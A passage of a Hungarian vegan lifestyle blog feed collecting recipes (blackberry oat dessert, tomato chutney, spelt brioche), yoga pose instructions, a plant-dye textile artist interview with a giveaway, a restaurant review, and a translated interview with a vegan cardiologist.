Szeder, málna, áfonya...nyamiii! Ki kell használni, míg van a kedvenceinkből. Az én választásom most a szederre esett. Egy sütés nélküli könnyed, könnyen összedobható finomságok készítettem, amit az egész család ( beleértve a cukorfalókat is) imád. Ha szereted a lágy könnyed finomságokat, és úgy gondolod ebben a hőségben te is megérdemled, készítsd el bátran. Nem fogod megbánni! Hozzávalók - 350gr zabpehely - 1 adag fekete kávé - 200ml növényi tej - 30gr édesítő + 50gr - rumaroma - 40gr kakaópor - 1 cékla - 250gr mascarpone - 3 tojás - 200gr szeder Így készítsd - Főzd le a kávét, majd keverd bele a tejet, rumaromát, és az édesítőt - Reszeld le a céklát, adj hozzá kakaópor ,és öntsd hozzá a zabpelyhet - Ezt a keveréket öntsd le kávéval, és hagyd, hogy jól megszívja magát - A krémhez a tojásokat választd ketté - Turmixold le a szedret, majd add hozzá a mascarponét, tojássárgáját és az édesítőt - A tojásfehérjét verd kemény habbá, majd forgasd a mascarponés keverékbe - Tedd a zabpelyhes keveréket egy edénybe, majd mehet rá a krém - Tedd hűtőbe pár órára, és már fogyaszthatod is
Vegán életmód – Botanika + nyereményjáték
2017. július 27. Zizi kalandjai
Nem is tudom hol találkoztam először Sára munkáival, de valahol az interneten futottam bele és valami hasonló fotóba, mint, amit a második képen láttok, sok-sok növényekkel festett pasztell színű sokaság volt a fotón és egyből arra gondoltam, hogy én mindegyikből szeretnék egyet, mert az ilyen színes dolgokra csak egyszerűen jó ránézni. Engem legalábbis nagyon felvidít egy ilyen kép. Egyből írtam is Sárának, hogy lenyűgöznek a munkái, imádom a csodaszép színeket, amelyeket elővarázsol!
Igen, elővarázsol, mégpedig növényekből, festőnövényekből. Nagyon érdekes és kreatív a munkája, amelyet most ebből az interjúból megismerhettek. Szóval fogjátok a kezetekbe a reggeli turmixotokat, kávétokat, teátokat, dőljetek hátra és olvassátok el Sárával készített interjúmat. Nyereményjáték pedig az interjú után!
Bemutatnád magad röviden, ki vagy, mivel foglalkozol?
Hajgató Sára vagyok, textilekkel, azon belül is festőnövényekkel színezett anyagokkal foglalkozom, ruhákat illetve kiegészítőket készítek azokból az anyagokból, amiket megfestek.
Hogyan jött az ötlet, hogy növényekkel kezdjél festeni textileket?
Évekig volt egy ékszermárkám, azonban az idők múlásával egyre inkább elkezdett foglalkoztatni a textilek és fonalak természetesebb megszínezése, elkezdtem utánajárni, kisérletezni, és megnyílt előttem a festőnövények csodás világa. Nagyobb rálátást szerettem volna a munkámban felhasznált alapanyagok eredetére és a magam módján szerettem volna tenni egy keveset a környezetterhelés csökkentéséért.
Mely növények a legalkalmasabbak arra, hogy fessünk velük?
Rengeteg növénynek van színezőpotenciálja azonban ezen belül van egy szűkebb csoportja a hagyományos festőnövényeknek, amelyek igazán időtálló, szép színeket eredményeznek. Az európai kultúrkörben a három ún. “nagy festőnövény” a festőcsülleng, a festőrezeda és a festőbuzér, színkeveréssel ebből a három alapfestékből temérdek gyönyörű árnyalatot hozhatunk létre. A növény megválasztása mellett a festendő alapanyag és a textil előkezelése is meghatározza a színeredményt.
Melyik volt a legkülönlegesebb növény, amit használtál textilfestésre vagy az a növény, amelyiken meglepődtél, hogy milyen csodás színt lehet kihozni belőle?
Igazán különleges élmény indigóval festeni, a folyamat maga is merőben eltér a többi festőnövénnyel való munkától, ezért ezt kimondottan szeretem. Festettem már elhervadt esküvői csokorral is textilt, ez is egy szép, és különleges módja volt a “Nagy Nap” megörökítésének.
Honnan szerzed be a festéshez használandó növényeket (vadon gyűjtés, lehet kapni boltban, online, külföldről)?
Sok növényt gyűjtök, szerencsére jópár inváziós faj, például a kanadai aranyvessző remek festőalapanyag, így nem kell visszafognom magam. Van néhány növény, amit kertben termesztek, nagy álmom, ami ha minden igaz a közeljövőben meg is valósul, egy kimondott festőnövény ültetvény és bemutatókert létrehozása. Ezen kívül néhány egzotikus festőnövényt külföldről, európai, méltányos kereskedésekből szerezek be, és számos konyhai hulladék is alkalmas textilszínezésre.
Milyen anyagokat festesz be ezekkel a növényi festékekkel?
100%-ban természetes szálösszetételű anyagokkal dolgozom, a kedvencem a len.
Milyen termékek készülnek az általad festett anyagokból? Ezeket is teljesen te készíted?
Ruhadarabokat készítek: megkötős ruhát, nadrágszoknyát, felsőket és kabátkákat tartalmaztak az eddigi kollekcióim, illetve az ezekhez kapcsolódó kiegészítőket, textil nesszeszert, kendőket, fonott nyakláncokat és karkötőket. Dolgozom egy lakberendezési kollekción, illetve külön öröm, amikor időm engedi, hogy fonalat fessek, amikből szövőszéken szövött kelméket hozok létre.
Mennyire tartósak a növényekkel, természetesen befestett anyagok? Egy ilyen anyagból készült felsőt hogyan lehet mosni, hogy minél tovább megőrizze csodaszép színét?
Egy kicsit gondosabb, tudatosabb kezelést igényelnek a festőnövényekkel színezett holmik – kézimosást, és PH-semleges mosószert javaslok a vásárlóimnak, illetve azt, hogy ne tegyék ki huzamos ideig tűző napsütésnek a darabokat. A megfelelően előkezelt textilen sokáig szép marad a szín, de én nem látok abban sem problémát, ha az ember időről-időre felfrissíti és újrafesti egy-egy kedves ruháját.
Van-e olyan recepted, amely alapján bárki otthon a konyhájában tud például egy színes konyharuhát készíteni?
Eső körben érdemes háztartásban fellelhető alapanyagokkal kísérletezni, ilyen például a hagymahéj, a kurkuma vagy a lilakáposzta. Ezek nem tartoznak a legtartósabb színezőanyagok közé, de azonnali sikerélményt adnak. A textilt érdemes timsóval előpácolni, majd készítünk egy festőlevet, amiben forralás nélkül egy jó órát főzzük a textilt.
Hol érhetők el a termékeid, hol lehet megvásárolni ezeket a színes csodákat?
Van egy bemutatótermünk, a CikkCakk Stúdió amit 3 kedves tervezőtársammal hoztunk létre, itt megtekinthetők a munkáim, illetve szoktam vásározni is, és készül a webshoppal egybekötött honlapom is.
Sára elérhetőségei:
– Botanika Facebook
– Botanika Instagram
– CikkCakk Stúdió Facebook
*****
NYEREMÉNYJÁTÉK!!!
Nyeremény : 1 darab indigóval festett-shibori technikával mintázott vászontáska. Írjátok meg ide a bejegyzés alá kommentben, hogy ti mit szeretnétek egy növénnyel festett csodaszép anyagból készíttetni magatoknak (sál, nyaklánc, szoknya, stb.)!
Szabályok : A kommentelésen felül plusz pontokért lájkolhatjátok Sára Facebook és Instagram oldalát (írjátok meg ezt is a kommentben, ha megtettétek). 2017. július 30-ig lehet játszani. Sorsolás a random.org-gal. Eredményhirdetés 2017. július 31-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek Sára postázza magyarországi címre vagy személyesen átvehető a CikkCakk Stúdióban, Budapesten.
10 érdekes (és nagyon fura) összetevő, amitől nem lesz vegán-kompatibilis egy termék
Kér valaki hód végbélmirigy váladékot? Kevés idegesítőbb dolog van annál, mint mikor egy kis tejtermék található a máskülönben növényi termékben. Azonban néhány összetevő még a szinte jól álcázott tejnél is alattomosabb. Íme a tíz legkülönösebb nem vegán összetevő listája, amelyeket megtalálhatsz az egyébként növényi alapú termékekben... A cikk ennek az írásnak fordítása. 1. Cera Alba Ez az alattomos összetevő édességekben és kozmetikumokban (például az ajakír) található meg és talán felismerhetőbb számunkra, amikor a másik nevén szerepel az összetevők felsorolásánál: ez lenne a méhviasz. A méhviaszt a dolgozó méhek állítják elő és a méz tárolásához kialakított helyhez használják fel. Mivel ez egy állati melléktermék, és a méhek kizsákmányolásával jár, így nem vegán. 2. L-Cisztein Ezt az Európában E920-ként ismert vegyületet, amelyet általában madártollból és disznószőrből állítanak elő, olykor péksüteményekbe teszik lisztjavítóként. Ugyan létezik szintetikus változata is, mivel ezt költséges előállítani, így nem túl gyakran fordul elő. 3. Halenyv A borok és sörök előállítása mögötti eljárás állati eredetű összetevők felhasználásával járhat, elsősorban a halenyv felhasználásával, amely más néven az úszóhólyag. Amíg egyre több kézműves sörfőzde hagyja el a halenyvet és egyre több borászat készít vegán italokat, fogyasztás előtt először mindig megéri utánanézni az összetevőknek (ebben segíthet minket a barnivore). 4. Bíborfesték, kármin Ez a vörös ételfesték néha felbukkan ételekben és italokban. Vegánok számára nem alkalmas fogyasztásra, előállítása során a bíbortetveket először összegyűjtik, kiszárítják, majd porítják, hogy megkapják a kívánt erős, vörös festéket. Mintegy 70.000 rovarra van szükség, hogy két kiló bíborfestéket kapjanak. 5. Hódzsír A hódzsírt megtaláljuk némelyik parfümben és számos élelmiszerben (többek között alkoholmentes italokban és pudingokban), valójában egy váladék, amelyet a hódok végbélmirigyéből vonnak ki. A hódok területmegjelölésre használják ezt a váladékot. Vanília illata van, amely magyarázatot ad rá, hogy miért használják fel édességekhez. Az USA Élelmiszer és Gyógyszer Adminisztrációs irányelvei szerint nem használják fel vanília kivonatokban, de megtalálható némely eper-és málnaízű termékben. 6. Lanolin Ellenőrizd az olyan termékek összetevőinek a listáját, mint például a rágógumi (és olyan bőrápoló termékekét, mint az ajakbalzsam), hogy van-e bennük lanolin. A lanolint ,,gyapjúzsírként is ismerik és alapvetően a hajzsírhoz hasonlít: a birkák gyapját vízállóvá teszi ez az anyag. A gyapjúzsírt összegyűjtik és hidratáló krémekhez és némelyik cukrászsüteményhez használják fel. 7. Csontszén A neve alapján egyértelműen állati eredetű ez az összetevő, viszont az már kevésbé nyilvánvaló, hogy miben találjuk meg. Az Egyesült Államokban a csontszenet olykor felhasználják a finomított cukor feldolgozásában, szerencsére az Egyesült Királyságban és Európában nem. Azoknak a cégeknek a listája, amely nem használnak csontszenet itt található. 8. Tejsavó Míg a legtöbb ember tisztában van vele, hogy a tejsavó tehéntejből származik, azt talán nem tudják, hogy milyen sokféle termékben megtalálható. A tejsavó a sajt elállításának a mellékterméke: az a maradék folyadék, amely a tej besűrűsödése és leszűrése után fennmarad. Megtaláljuk a chipsekben (ide tartozik némely sima sós is!), sült árukban és olyan nasikban, mint a keksz. 9. Sellakk A sellakk egy pajzstetű faj nőstényeinek gyantaszerű váladéka, használják cukrászsütemények fényes bevonására, bútorfényezőként és más háztartásban megtalálható terméknél. Pár éve még hanglemezek gyártásánál is használták. A legmeglepőbb használati módja a gyümölcsök fényezése (ha adalékanyagként használják, akkor E904-ként tüntetik fel). Olykor például az almákat vonják be ezzel a fényező anyaggal, hogy a természetes gyümölcs ,,viaszt helyettesítsék vele, amelyet a tisztítási eljárás során eltávolítanak. Szokták még citrusfélék kezelésére használni, hogy ezzel megnöveljék az élettartalmukat. 10. Hozzáadott D vitamin Nem minden D vitamin állati eredetű, de az a legbiztosabb, hogyha feltételezzük, hogy az. Amivel például a reggeliző pelyheket dúsítják, nem vegán, hacsak nincs az ellenkezője a terméken feltüntetve. A D2-vitamin a vegán verzió, és a D3 általában a lanolinból származik (gyapjú), kivéve ha a Vitashine-ról van szó, amely az egyetlen növényi alapú D3-vitamin forrás. Fordítás: A javulás útjai The post 10 érdekes (és nagyon fura) összetevő, amitől nem lesz vegán-kompatibilis egy termék appeared first on VegaNinja.
Tégy a gerinced egészségéért! - Parighászana (kapupóz, keresztrúdpóz)
2017. július 21. Élj harmóniában
A parighászana (keresztrúdpóz vagy más néven kapupóz) nagyon jól nyújtja a törzsed oldalát, ezzel ellensúlyozva az ülőmunka okozta merevséget. Ez az ászana fokozza a csípő mobilitását, erősíti a hasizmokat, mély hátizmokat, comb izomzatát, oldalsó törzsizmokat. Csökkenti a háti és derék táji szakasz fájdalmait. Kiválóan átmasszírozza a hasi szerveket - javítja a máj, a gyomor, a belek, a vese és a petefészkek funkcióját. A parighászana jó székrekedés ellen is, mert kiváló emésztést javító, méregtelenítő hatással rendelkezik. Oldja a blokkokat a mellkasi területről, ezáltal segít a légzést szabadabbá tenni, növeli a tüdőkapacitást. Hogyan végezd el? - Sarokülésből (Vadzsrászanából) emelkedj fel térdelő állásba és a jobb lábadat tedd ki a tested mellé oldalra. A jobb talpad egy vonalban legyen a bal térdeddel. - A jobb lábad legyen aktív, húzd fel a térdkalácsod a combizmod segítségével. - Nyújtózz ki a két kezeddel oldalsó középtartásba, majd nyújtózz el jobb oldalra. - A jobb kezedet kilégzéssel helyezd tenyérrel fölfelé a jobb lábadra - combodra, lábszáradra. - A bal kezdete belégzéssel emeld a magasba , majd egy kilégzéssel dönts a jobb lábad irányába és közelítsd a jobb tenyered fölé a bal tenyered - lefele néző tenyérrel. - Belégzéssel nyújtó zkodj a törzseddel , nyújtsd meg a törzsed oldalát Kijövetel a pózból: aktív nyújtózás mellett, be légzéssel egyenesedj vissza, emeld a karokat oldalsó középtartásba, majd engedd le a tested mellé. Húzd vissza a jobb lábad és végezd el a gyakorlatot a mások oldalra is. A kitartás alatt a medencéd ne mozduljon el, tartsd stabilan - ehhez dolgozz aktívan a farizmokkal és a combizmokkal. Kilégzéssel próbáld a combokat hátrafelé csavarni, ez segít nyitni a csípődet. A mellkasod végig nézzen előre, a testedet tartsd egy síkban. Kezdő változatban a lábfejedet feszítsd vissza, aktívan nyújtózz a sarkaddal, későbbiekben a talpadat feszítsd le a talaj irányába. Belégzéssel húzd fel a térdkalácsot és a combizom segítségével tartsd egy vonalban a bokáddal. A karodban folyamatos, aktív izommunka legyen, nyújtózz a kézujjakkal is A behajlított láb lábszárát folyamatosan nyomd a talajba és abból próbálj nyújtózni a belégzéssel. A lapockáidat húzd befelé és lefelé a hátadba és a vállakat gördítsd hátrafelé lefelé, távolítsd el a fülektől. Belégzéssel p róbáld folyamatosan nyitni a mellkast azáltal, hogy távolítod a kulcscsontokat egymásról. Húzd b e a leng őbordákat is, figyelj rá hogy ne emeld ki a bordakosarad. Belégzéssel próbálj nyújtózni fejtetővel, szegcsonttal, nyisd a mellkast. Haladóbb változatban a fejed elfordíthatod fölfelé és elnézhetsz a fölül lévő kezed irányába. Amennyiben valamilyen nyakcsigolya rendellenességed, problémád van ne fordítsd el a fejed, a tekinteted nézzen előre. Ne végezd a jógapózt, amennyiben gerincsérved, bármiylen komoly gerincbetegséged vagy lágyéksérved van. Szívprobléma, tüdőtágulat esetén is kerüld ezt az ászanát. kezeletlen m agas vérnyomás esetén a kart ne emeld a fejed fölé. A jógagyakorlatokat először mindig hozzáértő jógaoktatóval sajátítsd el. J ó gyakorlást kívánok:) szeretettel: Kati
A jóga segít, hogy másképpen lásd a világot
2017. július 18. Élj harmóniában
A jóga nem azt jelenti, hogy egy tornagyakorlatot szépen, ügyesen tud valaki kivitelezni. A jóga tudatosság a testgyakorlatokban, légzőgyakorlatokban, gondolkodásban, a hétköznapi életben, viselkedésben, cselekedetekben, táplálkozásban... az élet minden területén. T udatosság minden lélegzetvételnél, amikor bezárod az ajtót, amikor más emberekkel kommunikálsz, amikor az életben felmerülő helyzetekre reagálsz, etc.... A tudatosság alapja a megfelelő tudás és a figyelem, fókuszálás. Sajátítsd el a jóga alapelveit és építsd be az életbe. A jóga által fejlődik a személyiséged, közelebb kerülsz Önmagadhoz, önismeretre tehetsz szert. Ahogy megváltozik a gondolkodásod a világról, a világ is meg fog változni körülötted. Boldogságot, harmóniát, szeretetet tapasztalsz:)
Paradicsom chutney (csatni)
2017. július 14. Élj harmóniában
Paradicsom chutney (csatni)A csatni (chuetney), ami megbolondítja az ételeket a tányérodon. Édes, sós, csípős, savanyú mindez egyben:) Kiváló étvágycsináló, emésztést segítő és segít kiemelni az ételek ízét. Minden ételt élvezetesebbé tesz. Az ájurvéda és az indiai konyha szinte minden étkezéshez készít valamilyen csatnit. A csatnikat fogyaszthatod melegen vagy hidegen is. Már néhány chuetneyi receptet közzé tettem a blogon - Szilva csatni itt olvasható az Alma csatnit pedig itt találod és egy nyári hűsítő friss kókuszos koriander csatni recetet is találsz a blogon A Jógatáborban a pakorát friss paradicsomból készült csatnival tálaltuk, hát mit ne mondjak, hatalmas sikere volt:) talán a paradicsom csatni a legnépszerűbb az összes csatni között, mert közel áll a nyugati emberek ízlésvilágához. A kókuszcsatni, szilvacsatni, répás vagy körte csatni kicsit érdekesebb az megszokott hazai ízekhez képest. A paradicsom csatni hozzávalói 2 ek. ghí (vegán változatban kókuszzsír) 1/4 tk. fekete mustármag 1/4 tk.római kömény 1 kis fahájrúd 2 szárított, tört chili 1/4 tk. kurkuma 2 pohár friss, érett, kemény paradicsom 1/3 csésze teljes értékű nádcukor 1/4 csésze mazsola 1/4 csésze só Vegyszermentes (bio) alapanyagokat használj! A paradicsomokat forró víz segítségével hámozd meg és vágd nagyobb darabokra. A ghít vagy olajat közepes lángon hevítsd fel. A forró zsiradékban pattogtasd ki a fekete mustármagot. Add hozzá a római köményt, fahéjat. amikor a fahéj sötétedik tedd hozzá a chilit, kurkumát és a paradicsomokat. Közepes lángon, folyamatosan kevergetve 10 percig főzd. Tedd hozzá a mazsolát, sót és a cukrot. 5 percig főzve hígabb csatnit kapsz. Ha jobban szereted a sűrűbb, lekvár szerű csatnit, akkor főzd 15 percig, hogy besűrűsödjön. Melegen vagy hidegen tálalhatod, hűben tárolható néhány napig.
Tönköly briós
2017. július 13. Éltető ételek
Nagy kedvenc volt a briós a Zöldház Bio Panzióban, minden reggelire lehetőség volt belőle enni. Finom egyszerűen vajjal megkenve, de számomra "tejes"kávéval volt az igazi. :) Miután hazaértem a táborból, az első dolgom volt elkészíteni ezt a finomságot. Én kissé alakítottam az eredeti receptet, a párom szerint ilyen finomat még nem készítettem. :) Recept, ahogyan Anikó, a panzió tulajdonosa készítette: Hozzávalók: - 35 dkg teljes kiőrlésű tönkölyliszt - 65 dkg fehér tönkölyliszt - 1 házi/bio egész tojás + 1 tojás sárgája - 5 dkg élesztő - 2,5 dl olaj - 3 dl tej - 10 dkg nádcukor - 2,5 dl (szóda, ásvány)víz - 1 jó nagy csipetnyi só Recept, ahogyan ÉN készítettem el: Hozzávalók: - 40 dkg teljes kiőrlésű tönkölyliszt - 60 dkg fehér tönkölyliszt - 1 házi/bio egész tojás + 1 tojás sárgája - 5 dkg élesztő - 20 dkg olvasztott vaj - 3 dl növényi tej - 10 dkg méz - 1 csapott teáskanál só A vizet nem véletlenül hagytam ki az én receptemből, mivel én mézzel készítettem, így csak nagyon kevéske vízre volt szükség az eredeti recepthez képest, mindenképp figyeld a tészta állagát! Elkészítése: - A megadott mennyiségű liszt közepében egy mélyedést csinálunk. Kb- 0,5 dl langyos vízzel az élesztőt belemorzsoljuk és felfuttatjuk. Majd hozzáadjuk a többi hozzávalót is, és jól kidagasztjuk. - Letakarva kb. 2 órát kelesztjük, közben néhányszor átdagasztjuk. - 5-6 dkg-os mennyiségű tésztákat kimérünk, és hengert sodrunk belőle. Ezt feltekerjük briós formára. - Tepsibe rakva ismét kelesztjük. - A maradék fehérjével megkenjük a tetejét. - A sütőt előmelegítjük 190 fokra. Mielőtt a tésztát betesszük a sütőbe, vízzel megspricceljük. - Mintegy 25 perc alatt készre sütjük. Miután kivesszük a sütőből, ismét vízzel bespricceljük. Rácson hagyjuk kihűlni.
Teszt: Great Bistro
2017. július 12. Zizi kalandjai
Még kora tavasszal márciusban kaptam meghívást Stőhr Grétától egy sajtóvacsorára a Great Bistro-ba. Azt hiszem az összes vendég nevében mondhatom, hogy egy fenomenális vacsorára voltunk hivatalosak, ahol igen csak megmozgatták az ízlelőbimbóinkat.
Grétáék tavaly nyáron (2016. július 13-án) nyitották meg bisztrójukat, ahol ízletes vegán reggeliket és ebédeket készítettek a vendégeknek. Aztán gondoltak egy nagyot – tudták, hogy lenne rá igény a vendégek visszajelzéseiből – és úgy döntöttek, hogy vacsorára is megnyitják kapuikat, vagyis tavasztól már nemcsak reggelizni és ebédelni, hanem vacsorázni is lehet náluk… nagyon kreatívan megalkotott és tálalt ízletes növényi alapú ételekből (vegán és gluténmentes) összeállított szezonális menüvel várják a hozzájuk betérőket.
A séfek, akik a vacsora menüt készítik: az ala carte séf Komócsin Zoltán, a sous chef Balogh Róbert, és az előkészületekben természetesen Gréta is részt vesz, felügyeli az egész folyamatot. A déli menükészítés továbbra is Gréta felelőssége a bisztróban, de hatalmas segítség számára, hogy este át tudja adni az ételkészítést profi szakácsoknak. A reggeli és ebédkínálat semmiben sem változott az eddigiekhez képest, csak az estékkel, és a szombattal bővültek.
Marinált karotta “lazac” remoulade mártással / Citrusos “joghurtos” zellerkrémleves
A Great Bistro számára nagyon fontos a szezonalitás, és az alapanyagok minősége, beszerzése. A legjobban szezonális termelői bio alapanyagokból szeretnek dolgozni, ezért úgy döntöttek, hogy a mini ala carte étlapjukat két havonta megújítják, és még akár napi séf ajánlatokat is tartalmazhat. A második fotón látható degusztációs menü már nem elérhető (már váltottak szezont), de ajánlom mindenkinek, hogy ha bármikor újra meglátja a karotta “lazacot” az étlapon, akkor ne hagyja ki. Az egy olyan, de olyan bomba étel, hogy szétrobbannak a szánkban az étel ízei!
Aszalt paradicsomos édesburgonyás gnocchi parmezán ropogóssal / Desszert válogatás
Gréta
A Great Bistro a héten ünnepli első születésnapját! Ezen alkalomból Grétáék nyereményjátékot hirdettek, amely nyereményeként egy 10.000 Ft értékű fine dining élményvacsorát, egyedi tervezésű vegán pénztárcát, Stőhr Gréta vegán életmód és szakácskönyvét 150 isteni recepttel, vagy egy különleges, limitált fűszercsomagot lehet nyerni! Játszani itt tudtok 2017. július 13-ig!
***
Great Bistro
1054 Budapest
Bank utca 6.
Facebook
Instagram
***
A vacsorát a Great Bistro biztosította számomra, a véleményem a sajátom. Ezen hivatalos sajtóeseményen kívül már privátilag is megfordultam a bisztróban több alkalommal is és mindig nagyon finomat ettem és kedves volt a kiszolgálás.
Fekete ribizlis maca golyók
2017. július 10. Vegán receptek Tőlünk Nektek
Annától kaptuk :)
Hozzávalók:
- Napraforgómag kb 10 dkg
- Tahini 3 ek
- 2 ek karob
- 4 ek maca por
- Puffasztott amarant
- 1 -1.5 ek kókuszzsír
- 1 ek szezámolaj
- 17-20 szem datolya
- Agavé szirup
- Kókuszreszelék
- Dió
Elkészítése:
A napraforgó magot puhára őröltem, hozzáadtam a datolyaszemeket és a kókuszzsírt, olajat és a tahinit. Együtt daráltam. Fekete ribizlit ( de lehet áfonya is vagy málna , szeder például) adtam hozzá 3-4 marékkal, ezzel is könnyebben darálódott. Meghintettem a karobbal, maca porral és kézzel összedolgoztam. Lehet agavé vagy datolya sziruppal még édesíteni a masszát. Az száraz összetevőket és a gyümölcsöket akár külön is lehet darálni, hogy finom legyen és utána tálban mindennel összedolgozni.
A masszát hűtőbe tettem kb 40 percre. Utána a megformázott golyókat darált kókuszreszelékbe vagy őrölt dióba vagy amarántba forgattam. Nekem a kókuszreszelékes ízlik legjobban.
Tipp: Reszelt karobcsokival is el tudom képzelni... :)
Jó étvágyat!
A növényi étrend: hathatós gyógymód Dr. Kim Williams szerint – interjú egy vegán orvossal
A szerkesztő jegyzete: Az American College of Cardiology távozó elnöke, Kim A. Williams MD 2003-ban lett vegán. Drámaian csökkentette az LDL koleszterinszintjét. Az MD magazin munkatársa, Megan Daily interjút készített vele az egészséges életmódja kapcsán, valamint arról, hogyan sikerül támogatnia a szívbarát, növényi alapú étrendet a kollégái körében, egy olyan érában, ahol nagy szerepet játszanak a gyógyszerek és a sebészeti beavatkozások. Fordította: Biró György Milyen lehet egy szobában állni tele kardiológusokkal, és azt kérni tőlük, hogy hagyjanak fel az üzlettel? És még el sem hessegettek onnan -- csodás volt, a reakciójuk hasonlított a teljes ACC-jére. Úgy érted, a növényi értendes üzeneted jól szerepelt a kollégáidnál? Nem kaptam negatív visszajelzést. Még ha húst esznek is, vagy nem edzenek, a munkatársaim nem érzik sértve magukat, mert tudják, hogy ez (a növényi alapú étrend) a legjobb dolog, amit a népességért tehetünk. A húsevés jelentős része az amerikai kultúrának, mint például a július 4.-ei barbecue, nem? De az. Viszont belemélyedni a növényi alapú étrend tudományába érdekes. A barbecue nem rossz dolog, amíg növényi. Az összes karcinogén, ami a hús szenes sütésével képződik, nem jön létre, ha ugyanígy sütsz mondjuk kukoricát, vagy hasonlót. Szóval nem a grillsütés az, ami az ételeinket egészségtelenné teszi? Azt gondolhatod, hogy nagyon veszélyes, de aztán kiderül, hogy mégsem. Ez jó példa arra, hogy a tudománynak nemcsak frissítésre van szüksége, de el is kell terjeszteni – a nagyszerű halálozási adatok az American Journal of Clinical Nutrition-ban csodálatosak, de ez nem segít, ha nincs rajta az olvasási listádon. Több és több infót kell eljuttatnunk az emberekhez. Mint például a 2006-os INTERMAP-tanulmány, ami fordított arányosságot mutatott a magas vérnyomás és a növényi fehérjebevitel között? Abszolút. Az egyik legveszélyesebb dolog a vegán táplálkozásban – és ez velem megtörtént -, hogy felbiztattam egy magas vérnyomásos betegemet arra, hogy próbálja ki a vegetáriánus étrendet, de elfelejtette mérni a vérnyomását otthon. A következő dolog, amiről értesülsz, hogy a beteg a sürgősségin vár (nagyon alacsony) 50-80-as vérnyomással, mert még mindig szedi a gyógyszert, amit a betegségre kapott, holott már nem kellene. Ennyire jól működik ez az étrend? Nagyon hatásos. Ha az emberek megértenék, hogyan szüntethetik meg a magas vérnyomást hetek, vagy hónapok alatt, igazán elképesztőnek találnák. Szóval mi az akadály? A kultúra? Vagy hogy a tanulmányban szereplő adatok nem meggyőzőek? Van egy kevés változtathatóság az adatokban. De született egy nemrég, (Yoko) Yokoyama által pubkikált analízis, amit 32 tanulmányt vett figyelembe. Három ezek közül azt mondta, hogy a vegán étrend növelheti a vérnyomást, de a többség jelentős előrelépést mutatott. Mindent összevetve az adatok pozitívak. Nyilvánvalóan vannak még tényezők – túlzott alkoholfogyasztás, nincs kutatva – amik a vegán táplálkozás ellenére is okozhatnak magas vérnyomást. Mégis, a növényi étrendnek részét kell képeznie a egészséges élet helyes megközelítésének. Az orvosoknak azt kellene tenniük, amiről prédikálnak -- ahhoz, hogy a pácienseiknek átmenjen az üzenet? Nagyon bonyolult, amikor egy túlsúlyos ember mondja neked, hogy fogyj le. Megfelelő benyomást kell mutatnunk. Rengeteget beszéltél arról, hogy a személyes történeted hogyan győzött meg abban, hogy növényi étrendre válts. Ez a motivációja a legtöbb kardiológusnak, aki húsmentes étrendet ajánl a pácienseinek? Egyre elterjedtebbé válik, de ha rákeresel google-n, hogy “vegán kardiológia”, látni fogsz pár különös dolgot. Láttam egyet, aki azt mondta “volt egy páciensem lupus myocarditis-szel, aki vegán lett, és minden helyre jött”, szóval olykor nem személyes, hanem orvosi tapasztalatok által váltanak. Szóval azt mondod, hogy a sztorik arról, hogy a növényi alapú diéta sok betegséget meggyógyít, igazak? Ó, igen. Van egy rakás betegség, ami megszűnt, vagy hihetetlen módon pozitív irányba változott, vannak adatok a multiplex szklerózis, rheumatoid arthritis, lupus kapcsán, és jó lenne, ha nagyon sok véletlenszerű kísérlet lenne. Nem volt elég sok? Az utolsó növényi étrendes vizsgálat, aminek utánanéztem, az ulcerative colitis (fekélyes vastagbélgyulladás) mentén történt. El voltam ámulva az adatoktól. Még régről hallottam Dr. Dean Ornish tanulmányáról a prosztatarákot vizsgálva, arról szólt, hogy a növényi eredetű étrend visszaszorítja a rákot, de legalábbis meggátolja annak növekedését. De ulcerative colitis-re még sosem láttam tanulmányt ezelőtt -- úgy sejtem, azért, mert kardiológus vagyok, így nem mindig olvasok egyéb irodalmat. A tanulmány kimutatta, hogy 100%-os volt a javulás az átállás utáni első évben, 90%-os a másodikban -- gyógyszerek nélkül. Nem tűnik úgy, mintha az emberek megkapnák az üzenetet. Meg fogják valaha? Úgy tekintek erre, mint egy kirakósra. Van egy darabod itt, egy másik ott, majd végül az emberek összerakják egy egésznek. Mit tettél az ACC-nél (Americal College of Cardiology) azért, hogy elősegítsd a növényi étkezés helyzetét? Egy a diadalaink közül magába foglalta a szövetségi USDA táplálkozási iránymutatását. Elsőre pontatlanul idézték a koleszterinnel kapcsolatos ajánlásainkat. Azt mondtuk, több kutatásra van szükség, de ezalatt nem azt értettük, hogy változtassák meg a ajánlott, napi 300mg-os felső határt. Szóval adtunk nekik valami hatalmas mennyiségű szakirodalmat. Azt írtuk nekik “Ó, kéjük Önöket, ne vonják vissza a 300mg-os határt, mert az emberek vaddisznókká vadulnak”, a szó szoros értelmében. De mostanra nincs koleszterinnel kapcsolatos felső határ az ő iránymutatásukban, igaz? Levették a 300mg-os felső határt pont az ellenkező okból (ahelyett, hogy felállítottak volna egy maximum plafont a fogyasztásnak). Azt mondják, mindenki olyan kevés koleszterint vigyen be, amennyi lehetséges, a cél a zéró szint, amennyiben megtehetjük. Nagyon örülünk ennek, jobb, mint amit kértünk. Forrás: http://www.mdmag.com/conference-coverage/acc-2016/vegan-diet-its-powerful-medicine-kim-williams-says-in-qa Kép forrása: Youtube The post A növényi étrend: hathatós gyógymód Dr. Kim Williams szerint – interjú egy vegán orvossal appeared first on VegaNinja.
Jógagyakorlatok és a tudat
2017. július 4. Élj harmóniában
A tested és az elméd szoros összefüggésben állnak egymással. Amikor az egyikben létrejön egy változás, az hatással lesz a másikra is. Ha az elmédben feszültség jön létre, akkor feszültség lesz a fizikai testedben is. A jógagyakorlatok segítségével megszabadulsz a feszültségektől, a fizikai test okozta szenvedéstől, az elméd nyugodttá válik és hatást gyakorolsz a gondolataidra is.
Egyszerű, vegán zöldbabfőzelék recept, ahogy anyukám készíti (gluténmentes)
